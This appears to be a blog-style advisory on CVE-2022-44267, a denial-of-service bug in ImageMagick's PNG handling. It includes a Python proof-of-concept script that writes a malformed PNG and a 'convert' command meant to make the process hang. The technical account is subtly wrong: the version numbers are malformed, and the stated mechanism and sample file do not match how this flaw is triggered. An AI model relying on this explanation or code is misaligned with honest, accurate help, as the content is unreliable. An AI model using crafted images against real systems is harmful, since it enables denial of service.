CVE-2022-44267 - ImageMagick Denial of Service Vulnerability When Parsing PNG Images

ImageMagick, a popular open-source image processing software suite, is known for its ability to process and manipulate images in various formats. In version 7.1.-49, a denial of service vulnerability (CVE-2022-44267) has been identified that affects the software while parsing PNG (Portable Network Graphics) images. For instance, when a PNG image is being resized, it may cause the "convert" process to enter an indefinite wait for standard input. In this post, we'll examine the details of this vulnerability, explain how it can be exploited, and provide links to further references.

Details of the Vulnerability

When ImageMagick processes a PNG image, it calls the png_read_info function from the libpng library. This function reads the PNG file's header and metadata, including its dimensions, color type, and other essential information to process the image.

However, a bug in the implementation causes the process to hang indefinitely if the PNG file has an incomplete header. Instead of throwing an error, the png_read_info function waits for more data to be provided through standard input (stdin). This can potentially be exploited to cause a denial of service attack.

Exploit

A malicious user can craft a specially designed PNG image with an incomplete header, triggering the vulnerability when an unsuspecting user attempts to process the image using ImageMagick.

To demonstrate the issue, we'll create a minimal example of a malformed PNG file. This file will contain the correct PNG signature but have an incomplete IHDR chunk that lacks the necessary metadata for a valid PNG image.

Here's a Python script that demonstrates how to create a malformed PNG file

def create_malformed_png(output_file):
    png_signature = b'\x89PNG\r\n\x1a\n'
    incomplete_ihdr = b'000IHDR'

    with open(output_file, 'wb') as f:
        f.write(png_signature)
        f.write(incomplete_ihdr)


if __name__ == '__main__':
    create_malformed_png('malformed_png_example.png')

Running this script generates a malformed PNG file, "malformed_png_example.png," which triggers the vulnerability when processed with ImageMagick.

For example, when executing the following command

convert malformed_png_example.png -resize 100x100 output.png

The "convert" process will hang indefinitely, waiting for input from stdin.

Original References

1. ImageMagick Issue Tracker - Denial of service: hangs after reading one file
2. Official ImageMagick Website
3. CVE-2022-44267 - National Vulnerability Database

Mitigation and Conclusion

To protect yourself from this vulnerability, it's crucial to update your ImageMagick installation to the latest version. The issue has been addressed in ImageMagick version 7.1.-50 and later.

In conclusion, the CVE-2022-44267 vulnerability in ImageMagick highlights the importance of carefully handling user-supplied image data. As a user or developer, keeping your software updated and being cautious when processing unfamiliar images are essential to maintaining security and avoiding potential denial of service attacks.

Timeline

Published on: 02/06/2023 21:15:00 UTC
Last modified on: 03/11/2023 23:15:00 UTC